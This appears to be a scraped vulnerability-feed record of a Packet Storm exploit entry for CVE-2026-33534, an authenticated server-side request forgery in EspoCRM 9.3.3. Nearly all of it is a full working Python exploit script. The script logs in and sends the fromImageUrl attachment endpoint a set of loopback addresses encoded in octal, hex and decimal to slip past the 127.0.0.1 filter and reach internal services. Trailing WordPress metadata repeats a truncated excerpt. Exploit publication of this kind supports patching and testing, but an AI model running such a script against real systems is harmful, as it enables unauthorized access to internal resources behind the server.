{“lastseen”:”2026-05-29T16:15:33″,”description”:”EspoCRM version 9.3.3 suffers from an authenticated server-side request forgery vulnerability…”,”published”:”2026-05-29T00:00:00″,”modified”:”2026-05-29T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 EspoCRM 9.3.3 Server-Side Request Forgery”,”source”:””,”references”:””,”id”:”PACKETSTORM:222196″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-33534″],”sourceData”:”# Exploit Title: EspoCRM 9.3.3 – Authenticated SSRF via Alternative IPv4 Notation\\n # Google Dork: N\/A\\n # Date: 2026-05-08\\n # Exploit Author: Max Gabriel (https:\/\/github.com\/EntroVyx)\\n # Vendor Homepage: https:\/\/www.espocrm.com\/\\n # Software Link: https:\/\/github.com\/espocrm\/espocrm\/releases\/tag\/9.3.3\\n # Version: 9.3.3\\n # Tested on: EspoCRM 9.3.3, Debian\/Kali, Apache\/PHP\\n # CVE : CVE-2026-33534\\n # Advisory: https:\/\/github.com\/espocrm\/espocrm\/security\/advisories\/GHSA-h7gx-8gwv-7g73\\n #\\n # Usage:\\n # python3 CVE-2026-33534.py -u http:\/\/127.0.0.1:8083 -U admin -P ‘Admin12345!’ –internal-port 8083 –cleanup\\n # python3 CVE-2026-33534.py -u https:\/\/target.example -U user -P pass –internal-port 9002 –internal-path \/interno.png\\n # python3 CVE-2026-33534.py -u https:\/\/target.example -U user -P pass –payload 0x7f000001 –payload 2130706433\\n \\n import argparse\\n import json\\n import sys\\n from pathlib import Path\\n from urllib.parse import urlparse, urlunparse\\n \\n import requests\\n \\n \\n DEFAULT_LOOPBACK_PAYLOADS = [\\n (\\”octal dotted\\”, \\”0177.0.0.1\\”),\\n (\\”octal dotted padded\\”, \\”0177.0000.0000.0001\\”),\\n (\\”octal compressed\\”, \\”0177.1\\”),\\n (\\”hex dotted\\”, \\”0x7f.0.0.1\\”),\\n (\\”hex dotted full\\”, \\”0x7f.0x0.0x0.0x1\\”),\\n (\\”hex dword\\”, \\”0x7f000001\\”),\\n (\\”decimal dword\\”, \\”2130706433\\”),\\n (\\”octal dword\\”, \\”017700000001\\”),\\n (\\”short IPv4 two-part\\”, \\”127.1\\”),\\n (\\”short IPv4 three-part\\”, \\”127.0.1\\”),\\n (\\”zero-padded dotted\\”, \\”127.000.000.001\\”),\\n (\\”long zero-padded octal\\”, \\”0000000000000000000000000177.0.0.1\\”),\\n ]\\n \\n \\n def normalize_base_url(value):\\n value = value.rstrip(\\”\/\\”)\\n parsed = urlparse(value)\\n \\n if not parsed.scheme or not parsed.netloc:\\n raise argparse.ArgumentTypeError(\\”target URL must include scheme and host\\”)\\n \\n return value\\n \\n \\n def default_internal_port(base_url):\\n parsed = urlparse(base_url)\\n \\n if parsed.port:\\n return parsed.port\\n \\n return 443 if parsed.scheme == \\”https\\” else 80\\n \\n \\n def ensure_path(value):\\n if not value:\\n return \\”\/\\”\\n \\n return value if value.startswith(\\”\/\\”) else f\\”\/{value}\\”\\n \\n \\n def make_url(base_url, host, internal_port, internal_path):\\n parsed = urlparse(base_url)\\n netloc = host\\n \\n default_port = 443 if parsed.scheme == \\”https\\” else 80\\n \\n if internal_port != default_port:\\n netloc = f\\”{host}:{internal_port}\\”\\n \\n return urlunparse((parsed.scheme, netloc, ensure_path(internal_path), \\”\\”, \\”\\”, \\”\\”))\\n \\n \\n def make_control_url(base_url, internal_port, internal_path):\\n return make_url(base_url, \\”127.0.0.1\\”, internal_port, internal_path)\\n \\n \\n def load_payloads(args):\\n payloads = list(DEFAULT_LOOPBACK_PAYLOADS)\\n \\n if args.no_default_payloads:\\n payloads = []\\n \\n for item in args.payload or []:\\n payloads.append((\\”custom\\”, item.strip()))\\n \\n if args.payload_file:\\n for line_number, raw_line in enumerate(Path(args.payload_file).read_text().splitlines(), start=1):\\n line = raw_line.strip()\\n \\n if not line or line.startswith(\\”#\\”):\\n continue\\n \\n if \\”=\\” in line:\\n label, host = line.split(\\”=\\”, 1)\\n payloads.append((label.strip() or f\\”file:{line_number}\\”, host.strip()))\\n else:\\n payloads.append((f\\”file:{line_number}\\”, line))\\n \\n seen = set()\\n output = []\\n \\n for label, host in payloads:\\n if not host or host in seen:\\n continue\\n \\n seen.add(host)\\n output.append((label, host))\\n \\n return output\\n \\n \\n def post_from_image_url(session, base_url, image_url, field, parent_type, parent_id, timeout):\\n endpoint = f\\”{base_url}\/api\/v1\/Attachment\/fromImageUrl\\”\\n payload = {\\n \\”url\\”: image_url,\\n \\”field\\”: field,\\n \\”parentType\\”: parent_type,\\n }\\n \\n if parent_id:\\n payload[\\”parentId\\”] = parent_id\\n \\n return session.post(endpoint, json=payload, timeout=timeout)\\n \\n \\n def parse_json(response):\\n try:\\n return response.json()\\n except json.JSONDecodeError:\\n return None\\n \\n \\n def short_body(response):\\n body = response.text.replace(\\”\\\\r\\”, \\”\\\\\\\\r\\”).replace(\\”\\\\n\\”, \\”\\\\\\\\n\\”)\\n \\n if len(body) \\u003e 420:\\n return body[:420] + \\”…\\”\\n \\n return body\\n \\n \\n def delete_attachment(session, base_url, attachment_id, timeout):\\n response = session.delete(f\\”{base_url}\/api\/v1\/Attachment\/{attachment_id}\\”, timeout=timeout)\\n \\n return response.status_code in {200, 204}\\n \\n \\n def is_successful_bypass(response):\\n data = parse_json(response)\\n \\n return (\\n response.status_code == 200 and\\n isinstance(data, dict) and\\n bool(data.get(\\”id\\”))\\n ), data\\n \\n \\n def print_result(label, host, response, data):\\n if isinstance(data, dict) and data.get(\\”id\\”):\\n print(\\n f\\”[+] {label:24} {host:38} HTTP {response.status_code} \\”\\n f\\”id={data.get(‘id’)} type={data.get(‘type’)} size={data.get(‘size’)}\\”\\n )\\n \\n return\\n \\n reason = response.headers.get(\\”X-Status-Reason\\”) or short_body(response) or \\”-\\”\\n print(f\\”[-] {label:24} {host:38} HTTP {response.status_code} {reason}\\”)\\n \\n \\n def main():\\n parser = argparse.ArgumentParser(\\n description=\\”Authenticated EspoCRM CVE-2026-33534 SSRF verification exploit with multiple encoded loopback payloads.\\”\\n )\\n parser.add_argument(\\”-u\\”, \\”–url\\”, required=True, type=normalize_base_url, help=\\”Base URL, e.g. http:\/\/host:8083\\”)\\n parser.add_argument(\\”-U\\”, \\”–username\\”, required=True, help=\\”EspoCRM username\\”)\\n parser.add_argument(\\”-P\\”, \\”–password\\”, required=True, help=\\”EspoCRM password\\”)\\n parser.add_argument(\\”–internal-port\\”, type=int, help=\\”Internal loopback port for the self-fetch PoC\\”)\\n parser.add_argument(\\”–internal-path\\”, default=\\”\/client\/img\/logo-light.svg\\”, help=\\”Internal path for the self-fetch PoC\\”)\\n parser.add_argument(\\”–payload\\”, action=\\”append\\”, help=\\”Additional loopback host notation to test, e.g. 0x7f000001\\”)\\n parser.add_argument(\\”–payload-file\\”, help=\\”File with one host payload per line, or label=host\\”)\\n parser.add_argument(\\”–no-default-payloads\\”, action=\\”store_true\\”, help=\\”Use only –payload\/–payload-file entries\\”)\\n parser.add_argument(\\”–field\\”, default=\\”avatar\\”, help=\\”Attachment field used by fromImageUrl\\”)\\n parser.add_argument(\\”–parent-type\\”, default=\\”User\\”, help=\\”Parent entity type used by fromImageUrl\\”)\\n parser.add_argument(\\”–parent-id\\”, help=\\”Optional parent entity id\\”)\\n parser.add_argument(\\”–timeout\\”, type=float, default=15.0, help=\\”HTTP timeout\\”)\\n parser.add_argument(\\”–cleanup\\”, action=\\”store_true\\”, help=\\”Attempt to delete attachments created by successful payloads\\”)\\n parser.add_argument(\\”–stop-on-first\\”, action=\\”store_true\\”, help=\\”Stop after the first successful payload\\”)\\n parser.add_argument(\\”–insecure\\”, action=\\”store_true\\”, help=\\”Disable TLS certificate verification\\”)\\n args = parser.parse_args()\\n \\n payloads = load_payloads(args)\\n \\n if not payloads:\\n print(\\”[-] No payloads to test.\\”)\\n return 2\\n \\n internal_port = args.internal_port or default_internal_port(args.url)\\n control_url = make_control_url(args.url, internal_port, args.internal_path)\\n \\n session = requests.Session()\\n session.auth = (args.username, args.password)\\n session.headers.update({\\”Accept\\”: \\”application\/json\\”})\\n session.verify = not args.insecure\\n \\n print(f\\”[*] Target: {args.url}\\”)\\n print(f\\”[*] Control URL: {control_url}\\”)\\n print(f\\”[*] Payload count: {len(payloads)}\\”)\\n \\n control = post_from_image_url(\\n session,\\n args.url,\\n control_url,\\n args.field,\\n args.parent_type,\\n args.parent_id,\\n args.timeout,\\n )\\n \\n print(f\\”[*] Control response: HTTP {control.status_code} {control.headers.get(‘X-Status-Reason’) or short_body(control) or ‘-‘}\\”)\\n \\n if control.status_code != 403:\\n print(\\”[!] The direct 127.0.0.1 control was not blocked with HTTP 403. Results may not prove CVE-2026-33534.\\”)\\n \\n successes = []\\n \\n for label, host in payloads:\\n ssrf_url = make_url(args.url, host, internal_port, args.internal_path)\\n response = post_from_image_url(\\n session,\\n args.url,\\n ssrf_url,\\n args.field,\\n args.parent_type,\\n args.parent_id,\\n args.timeout,\\n )\\n successful, data = is_successful_bypass(response)\\n print_result(label, host, response, data)\\n \\n if successful:\\n successes.append((label, host, ssrf_url, data))\\n \\n if args.cleanup and data.get(\\”id\\”):\\n if delete_attachment(session, args.url, data[\\”id\\”], args.timeout):\\n print(f\\” cleanup: deleted attachment {data[‘id’]}\\”)\\n else:\\n print(f\\” cleanup: failed to delete attachment {data[‘id’]}\\”)\\n \\n if args.stop_on_first:\\n break\\n \\n if not successes:\\n print(\\”[-] No encoded loopback payload produced an attachment.\\”)\\n return 2\\n \\n print(\\”\\”)\\n print(\\”[+] Vulnerable behavior confirmed.\\”)\\n print(f\\”[+] Direct loopback control: HTTP {control.status_code}\\”)\\n print(f\\”[+] Successful payloads: {len(successes)}\\”)\\n \\n for label, host, ssrf_url, data in successes:\\n print(f\\” – {label}: {host} -\\u003e {data.get(‘type’)} ({ssrf_url})\\”)\\n \\n return 0 if control.status_code == 403 else 1\\n \\n \\n if __name__ == \\”__main__\\”:\\n try:\\n sys.exit(main())\\n except requests.RequestException as exc:\\n print(f\\”[-] HTTP error: {exc}\\”)\\n sys.exit(1)”,”sourceHref”:”https:\/\/packetstorm.news\/download\/222196″,”cvss”:{“score”:4.3,”severity”:”MEDIUM”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:U\/C:L\/I:N\/A:N”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/222196\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-05-29T16:15:33″,”description”:”EspoCRM version 9.3.3 suffers from an authenticated server-side request forgery vulnerability…”,”published”:”2026-05-29T00:00:00″,”modified”:”2026-05-29T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 EspoCRM 9.3.3 Server-Side Request Forgery”,”source”:””,”references”:””,”id”:”PACKETSTORM:222196″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-33534″],”sourceData”:”# Exploit Title: EspoCRM 9.3.3 – Authenticated SSRF via Alternative…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,123,12,21,13,53,7,11,5],"class_list":["post-58268","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-43","tag-exploit","tag-medium","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n